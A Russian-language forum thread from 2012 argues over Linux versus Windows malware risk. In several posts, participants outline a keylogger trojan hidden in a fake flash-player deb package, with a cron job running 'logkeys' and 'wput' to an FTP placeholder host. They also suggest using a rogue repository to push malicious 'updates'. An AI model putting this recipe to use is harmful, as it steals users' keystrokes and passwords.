Слева, в проекте, никаких ассоциаций не вызывает?
Ну у меня ассоциации вызвало builder заголовке окна. Прямую ссылку на Orca можно? Посмотрим как оно там будет выглядеть.
Ну и касательно какого setup.exe я не видел. Бывают конечно и такие exe, которые самораспаковывающийся архив, но в общем случае дело несколько печальнее. Во всяком случае в линуксе как правило до установки пакета узнать чего и куда он писать будет проще чем в винде.
Yesterday it worked.
Today it is not working.
Windows is like that.
Неактивен
Прямую ссылку на Orca можно?
https://bigvax.nm.ru/orca.zip - Там не все так красиво
Ну и касательно какого setup.exe я не видел. Бывают конечно и такие exe, которые самораспаковывающийся архив, но в общем случае дело несколько печальнее. Во всяком случае в линуксе как правило до установки пакета узнать чего и куда он писать будет проще чем в винде.
стандартный для винды все же msi, а не setup.exe. Вы же сравниваете rpm-пакет, стандартный для определенного дистрибутива, и возможности его просмотра с возможностями msi, который стандарт для винды (то, что есть другие варинты - сути не меняет). При чем тут setup.exe? Если в линуксе будет бинарник, который будет устанавливать прогу из зашифрованного архива своей собственной структуры, и я попрошу Вас указать куда и что он будет писать, то Вы сможете мне ответить?
ххх: у тебя iperf есть?
yyy: iperf? перфоратор от Apple чтоле?
xxx: Во всем мире уже известны российские дороги и дураки. Сейчас к ним еще домены добавятся.
Неактивен
Там не все так красиво
Это да. наглядность прямо на высшем уровне.
Вы же сравниваете rpm-пакет, стандартный для определенного дистрибутива,
Ну вообще то до лампочки для какого дистрибутива, равно как и до лампочки deb это или rpm.
Yesterday it worked.
Today it is not working.
Windows is like that.
Неактивен
Продолжаю работать над своим троянчиком. Пока выкладываю текущие наработки:
Итак, что этот шмоток кода уже умеет: при запуске копироваться в скрытую папку и прописываться в автозагрузку KDE4, Unity и Gnome(v3 не тестил). После этого вешается на порт 4436 и ждет клиента. Пока только умеет отсылать содержимое запрашиваемого каталога. Клиент я уже написал, но на шарпе и на винду. Не сочтите за трололо, просто мне так легче и быстрее сделать оконное приложение.
В работе:
Вывод текста можно убрать, закомментив директиву VERBOSE. А вообще запускается без консольки. Найдете баги, недоработки, будут пожелания - пишите.
Неактивен
Это да. наглядность прямо на высшем уровне.
но работает и можно изменять/добавлять таблицы, а также редактировать их структуру и создавать пакеты
ххх: у тебя iperf есть?
yyy: iperf? перфоратор от Apple чтоле?
xxx: Во всем мире уже известны российские дороги и дураки. Сейчас к ним еще домены добавятся.
Неактивен
но работает
Но тем не менее распознавание потенциальных зловредов в линуксе это более тривиальная задача нежели в Божественной.
Итак, что этот шмоток кода уже умеет:
Молодец, давай работай дальше. Когда закончишь я тебе сообщу как следует запускать программы не из официальных репов, а вот такого происхождения.
Yesterday it worked.
Today it is not working.
Windows is like that.
Неактивен
Но тем не менее распознавание потенциальных зловредов в линуксе это более тривиальная задача нежели в Божественной.
ничуть и там и тут - нужно знать и понимать
ххх: у тебя iperf есть?
yyy: iperf? перфоратор от Apple чтоле?
xxx: Во всем мире уже известны российские дороги и дураки. Сейчас к ним еще домены добавятся.
Неактивен
Когда закончишь я тебе сообщу как следует запускать программы не из официальных репов, а вот такого происхождения.
Намек понял, но вот смотрю на людей с андроидами и думаю, чего им официальный магазин не нравится?
Неактивен
NEMO, Вот это уже что-то. Так глядишь и родится реальный бекдур -)
Винда - это ведро с тухлыми червями. (с) Rector
---
-хакир недоучка, некто Ректор, прославленный мудак из мухосранска, автор «Я этого не потерплю» и «Cмотри,а то я начну работать против тебя» «Ломаю по IP недорого» и других не менее веселых выражений. Любитель подсматривать в замочную скважину и читать чужую почту. (c) Неизвестный техник из лаборатории
Неактивен
ничуть smile и там и тут - нужно знать и понимать
Я про то, что под Божественной это несколько более муторно будет. По типу как для установки одной софтинки требуется ввести лицензионный код, записанный на CD естественно, из 20 буквенно-цифровых символов, а для установки другой — из 100 цифровых.
Какую софтинку при прочих равных будет муторнее устанавливать?
Yesterday it worked.
Today it is not working.
Windows is like that.
Неактивен
а для установки другой — из 100 цифровых.
Таких на СD не встречал. Как правило, длинные ключи получают по почте.
Неактивен
Таких на СD не встречал.
Это я просто для примера. Действия то в обоих случаях одинаково тривиальные, но разница есть.
PS: Но ты не отвлекайся, совершенствуй своего трояна. Даю слово, как допишешь — я его у себя обязательно запущу.
Редактировался ikkunan salvataja (13-09-12 14:37:18)
Yesterday it worked.
Today it is not working.
Windows is like that.
Неактивен
p.s. Вернее они доступны, но не все знают где искать
Не забываем и про торренты Как правило практически все вначале устанавливают именно оттуда.
А так даже кейлоггеры с сорцами у пенгванутых, хы-хы! Подсовываем пенгванутому хомячку в пакетик с флешплеером какой нибудь logkeys, софтинку для отправки лога на какой нибудь айпишник, скриптик в init.d. Улыбаемсо и машем, улыбаемсо и машем
База сама по себе сплошной скрипт (с) AleksK
При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка
Неактивен
А делается все проще простого - создается какое-нибудь зеркало с пакетами популярного дистрибутива старой версии, оф репозитории которого уже недоступны, например Debian 5 или OpenSuSE 10, и в каждый пакет подсовывается зловред
А так даже кейлоггеры с сорцами у пенгванутых, хы-хы! Подсовываем пенгванутому хомячку в пакетик с флешплеером какой нибудь logkeys, софтинку для отправки лога на какой нибудь айпишник, скриптик в init.d.
Так где оно, где хотя бы единичное заражение, хоть один заблокированный linux!!!??? Дайте хотя бы жёлтую ссылку на какого нибудь Карманова с душераздирающей истории его мытарств в linux и красивыми скриншотами, который словил подобное чудо, чёрт с ним с действующим экземпляром!
В детстве я молил бога о велосипеде;
потом понял что бог работает по-другому...
я украл велосипед и стал молить бога о прощении.
Аль Пачино
Неактивен
Так где оно, где хотя бы единичное заражение, хоть один заблокированный linux!!!??? Дайте хотя бы жёлтую ссылку на какого нибудь Карманова с душераздирающей истории его мытарств в linux и красивыми скриншотами, который словил подобное чудо, чёрт с ним с действующим экземпляром!
Хе-хе-хе!!! На х*й блокировать то!!! Ты прикинь, добавляем в деб пакетик с супер-пупер-мега флешплеером, типа собственноручно изваяного на коленке (а ведь флеш плеер больше для поделия не будет ) чтобы посмотреть какой нито ролик, logkeys, wput, шкриптик в крон Даже программить ничо не надо
Я, лично, больше чем уверен, что скачают как миленькие, причём одна из причин будет, что для поделия по вашим дебильным утверждениям малвари нет И соответственно никакие антивири НИНУЖНЫ!!! Думайте так и дальше Особенно подумайте над тем, что КАЖДЫЙ швабодный джастфофанщеГ на уебанте (а это ведь линупс ) из числа сестрёнок, подружек, дедушек, бабушек и собак с кошками, которыми вы установили поделие будут проверять с лупой, что притащил себе этот пакет Да-да-да!!! Именно так!
Я всё таки на выходных изваяю пакетик на эту тему
Редактировался selenscy (13-09-12 17:37:52)
База сама по себе сплошной скрипт (с) AleksK
При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка
Неактивен
Дайте хотя бы жёлтую ссылку на какого нибудь Карманова
Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.
Неактивен
Я всё таки на выходных изваяю пакетик на эту тему
С нетерпением ждём. Хотелось бы ещё конечно и в rpm завёрнутый увидеть, ну да ладно, сам перепакую перед запуском. Ну а не будет пакетика, в общем сам понимаешь...
Yesterday it worked.
Today it is not working.
Windows is like that.
Неактивен
Цирк блин . Троянец под линь не сложнее такого же под винду. Спасает только то, что проги ставятся с реп ну и неуловимый джо не последнюю роль играет .
2 NEMO, Как идея можно в том же deb пакете добавить свой левый репозитарий(как, например, это делает опера). Потом попытаться скормить из него клон какой нибудь известной проги под видом обновления. В принципе можно будет добиться массового заражения . А так об дизассемблировании для поиска заразы читать весело ikkunan salvataja, жги исчо . Так и представляю себе Мариванну дизассемблирующую прогу
Нет, так мы целей гнусных не достигнем... / В.П. Вишневский
Неактивен
Потом попытаться скормить из него клон какой нибудь известной проги под видом обновления.
Во, точно. Подпихнуть туда ссылку на образ какого-нибудь zver-DVD, чтобы с него обновилось. Ну а после обновления с вирусами куда проще будет.
Yesterday it worked.
Today it is not working.
Windows is like that.
Неактивен
Ну а не будет пакетика, в общем сам понимаешь...
В общем я продолжаю тихо охуевать от представителей сообчества. Пингвин вроде никаким боком страусу не родня, однако желание прятать голову в песок разумному объяснению не поддается.
Сегодня отрасль вирусописательства насквозь коммерциализована. Если мотивы того же автора "Чернобыля" покрыты мраком, то мотивы современных дельцов очевидны - получение денег. Тем более пойманый троян на все 100% соответствует признакам "коммерческого вируса". Ну не будет никто писать такое ради прикола, а если его написали, значит это кому то нужно.
Проще говоря кто-то решил постричь и линукс пользователей. Но вместо того, чтобы почесать репку и принять первентивные меры соопчество решило принять позу страуса, которая как раз удобна для подойти сзади и отиметь.
Господа, ну подумать головой можно! Для чего писали данный троян? Прикола ради? Или для вполне конкретных целей личного обогащения?
Здесь будет уместно напомнить про пользователей МакОС, тоже любивших позу страуса, и ботнета на Маках. После чего вспомнить, что архитектурно Мак и Линукс - близнецы братья.
Короче - умный поймет, а дураков и в церкви бьют.
"Оно, конечно, можно научить медведя ездить на велосипеде. Да только будет ли медведю от этого польза и удовольствие?" (с) А. и Б. Стругацкие
Неактивен
IvanOFF, забейте. Вы видели, что в моей ветке творится? Ну, нет у линуксоидов вирусов. Нигде нет, и в винде тоже.
Кста, ставьте +, тринадцатым будете.
Редактировался Белая рысь (14-09-12 01:41:56)
Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.
Неактивен
Цирк блин . Троянец под линь не сложнее такого же под винду. Спасает только то, что проги ставятся с реп ну и неуловимый джо не последнюю роль играет .
Совершенно верно!
ikkunan salvataja, жги исчо . Так и представляю себе Мариванну дизассемблирующую прогу
Ну пенгванутый, хуле
Кстате, накидал тут покетик тестовый Работает, шлёт мне лог клавы, явки, пароли каждый час
Добавлено спустя 10 мин 36 с:
С нетерпением ждём. Хотелось бы ещё конечно и в rpm завёрнутый увидеть, ну да ладно, сам перепакую перед запуском. Ну а не будет пакетика, в общем сам понимаешь...
Хи-хи-хи! Не пирижывай! Усё буит оррлайт!!! По крайней мере под уебантой 10.04 арбайтает Думаю, что и под другими уебантами тоже будет.
Редактировался selenscy (14-09-12 13:14:31)
База сама по себе сплошной скрипт (с) AleksK
При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка
Неактивен
Но вместо того, чтобы почесать репку и принять первентивные меры соопчество решило принять позу страуса, которая как раз удобна для подойти сзади и отиметь.
Значит так, во первых получивши пакет из недоверенного источника я первым делом поинтересуюсь а не хочет ли сия софтинка работать демоном, это делается на счёт раз путём элементарного просмотра rpm-файла как архива. Ежели такое наличествует то такой пакет сразу же будет послан куда подальше. Но допустим такого нету и задача пакета тырить информацию из пользовательского каталога и передавать её по назначению. Будет она это делать или нет я не знаю, но я знаю что в редакторе меню KDE есть вот такая вкладочка (кстати, а где можно посмотреть на подобный редактор в Божественной?)
И соответственно для запуска подобных софтинок создаётся некий фейковый юзер, домашний каталог которого лежит внутри каталога основного пользователя, этот юзер вполне может из этого каталога основного пользователя читать, может там создавать файлы, но поскольку на каталоге стоит sticky бит, то поудалять он там сможет только то, что сам и наваял, тоже самое относится и к переименованию. Далее, помимо всего этот фейковый юзер входит в группу noinet, в отношении которой действует правило
iptables -A OUTPUT -m owner --gid-owner noinet -j DROP.
Спрашивается, какую гадость этот вирус может сделать на моём компе?
Yesterday it worked.
Today it is not working.
Windows is like that.
Неактивен
я первым делом поинтересуюсь а не хочет ли сия софтинка работать демоном,
Демона не будет Мы поступим проще Положится пара скриптиков при установке в /etc/cron.hourly например logkeys -s -o /var/log/keys, wput /var/log/keys ftp://куда_мне_надо
Больше то и не надо. Действительно данная фигня ничего не делает
Редактировался selenscy (14-09-12 13:24:43)
База сама по себе сплошной скрипт (с) AleksK
При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка
Неактивен